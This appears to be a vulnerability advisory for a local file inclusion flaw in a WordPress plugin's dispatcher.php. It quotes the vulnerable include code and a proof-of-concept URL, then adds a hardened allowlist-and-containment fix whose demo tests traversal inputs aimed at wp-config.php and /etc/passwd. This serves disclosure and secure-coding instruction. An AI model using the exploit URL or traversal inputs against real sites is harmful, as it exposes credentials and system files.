# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
# Version: 3.7.3
# Tested on: Firefox
# Vulnerable File: dispatcher.php
# Vulnerable Code:
```
// $_GET['open'] is concatenated into the include path with no validation
if ( isset($_GET['open']) ) {
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
echo '
<div id="welcome-panel" class="welcome-panel"
style="padding-bottom: 20px;">
<div class="welcome-panel-column-container">';
include_once( ABSPATH . WPINC . '/feed.php' );
```
# Proof of Concept:
localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]
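
A hardened form of the include shown above, as an added example that is not the plugin's code or a vendor fix: the `open` value selects a name from a fixed allowlist, and the resolved path is checked to still sit inside the base directory. The function name `wpgov_resolve_view`, the allowlist entries and the temp directory are assumptions made for the demo.

```php
<?php
// Added example, not the plugin's code. The function name, the allowlist
// entries and the temp directory are assumptions made for the demo.

/**
 * Map a requested view name to a file inside $baseDir.
 * Returns the canonical path, or null when the request must be refused.
 */
function wpgov_resolve_view(string $requested, string $baseDir, array $allowed): ?string
{
    // 1. Exact-match allowlist: the request selects a known name; it never builds a path.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. Canonicalise both paths; realpath() returns false for missing files.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Containment: the resolved file must still sit under the base directory
    //    (catches symlinks and allowlist entries that contain separators).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Constructed demo: a temp directory stands in for the plugin folder.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wpgov_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'settings.php', "<?php // demo view\n");
$allowed = ['settings.php', 'import.php'];   // import.php is allowed but absent

$requests = ['settings.php', 'import.php', '../../wp-config.php', '/etc/passwd'];
foreach ($requests as $open) {
    $resolved = wpgov_resolve_view($open, $dir, $allowed);
    printf("%-22s => %s\n", $open, $resolved === null ? 'refused' : 'include ' . basename($resolved));
}

unlink($dir . DIRECTORY_SEPARATOR . 'settings.php');
rmdir($dir);
```

In the dispatcher, the `include` would run only when the function returns a non-null path; every other request falls through to the default panel.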